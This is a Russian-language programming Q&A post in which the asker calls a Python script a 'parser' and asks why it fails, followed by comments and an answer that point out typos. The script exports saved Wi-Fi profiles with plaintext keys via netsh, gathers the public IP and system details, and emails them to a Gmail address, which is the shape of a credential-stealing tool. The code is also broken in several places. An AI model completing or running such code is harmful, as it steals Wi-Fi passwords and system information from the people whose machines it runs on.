# Почему не работает код написанный на питоне?

Tags: python

Хотел сделать парсер на питоне но почему-то не работает. Вот код:

```
import subprocess as sp
from xml.dom import minidom
import requests
from time import sleep
import platform as pf
import smtplib
from email.mime.text import MIMEText
from email.mime.multipart import MIMEMultipart

sp.call( 'netsh wlan show profile' )
sp.call( 'netsh wlan export profile folder=storage\emulated\ key =clear' )

sleep( 2 )

def wifi_parce():
    doc = minidom.parse( 'storage\emulated\Беспровадная сеть-Mirjalol.xml' )
    
    wifi_name = doc.getElementsByTagName( 'name' )
    wifi_password = doc.getElementsByTagName( 'keyMaterial' )
    
    global data
    data = f'Wi-Fi name : { wifi_name}\nWi-Fi password : { wifi_password }'

def get_ip():
    response = ruquests.get( 'https://myip.dnsomatic.com' )
    ip = response.text
    
    global data_ip
    data_ip = f'IP ADDRESS : { ip }'
    
def info_pc():
    processor = pf.processor()
    name_sys = pf.system + ' ' + pf.release()
    net_pc = pf.node()
    ip_pc = socket.gethostbyname( socket.gethostname() )
    
    global data_pc
    data_pc = f'''
    Процессор : { processor }\n
    Система : { name_sys }\n
    Сетевое имя ПК : { net_pc }\n
    IP ADDRESS ПК : { ip_pc }\n
    '''
def all_info():
    global data_all_info
    data_all_info = f'{ data }\n{ data_ip }\n{ data_pc }'

def send_mail():
    msg = MIMEMultipart()
    msg[ 'Subject' ] = 'Info of PC'
    msg[ 'From' ] = 'xudoyberdi0410@gmail.com'
    body = data_all_info
    msg.attach( MIMEText( body, 'plain' ) )
    
    server = smtplib.SMTP_SSL( 'smt.gmail.com', 465 )
    
    server.login( xudoyberdi0410@gmail.com, mypassword)
    server.sendmail( xudoyberdi0410@gmail.com, mypassword, msg.as_string() )
    server.quit()
    
def main():
    wifi_parce()
    get_ip()
    info_pc()
    all_info()
    send_mail()
    
main()
```

Comment: что именно не работает?

Comment: Не пишите, пожалуйста, "код не работает", скажите, что конкретно происходит не так, по вашему мнению. По возможности, лучше почитать [как создать минимальный, самодостаточный и воспроизводимый пример](https://ru.stackoverflow.com/help/minimal-reproducible-example) и сократить код, чтобы остался только проблемный момент без лишних подробностей.

Comment: Код работает так как он написан.

Answer (score 1):

во-первых
server.login( xudoyberdi0410@gmail.com, mypassword)
server.sendmail( xudoyberdi0410@gmail.com, mypassword, msg.as_string() )

логин и пароль прямо так передаёте? не в виде строки?

во-вторых:

```
response = ruquests.get('https://myip.dnsomatic.com')
```

точно `ruquests`, а не `requests`?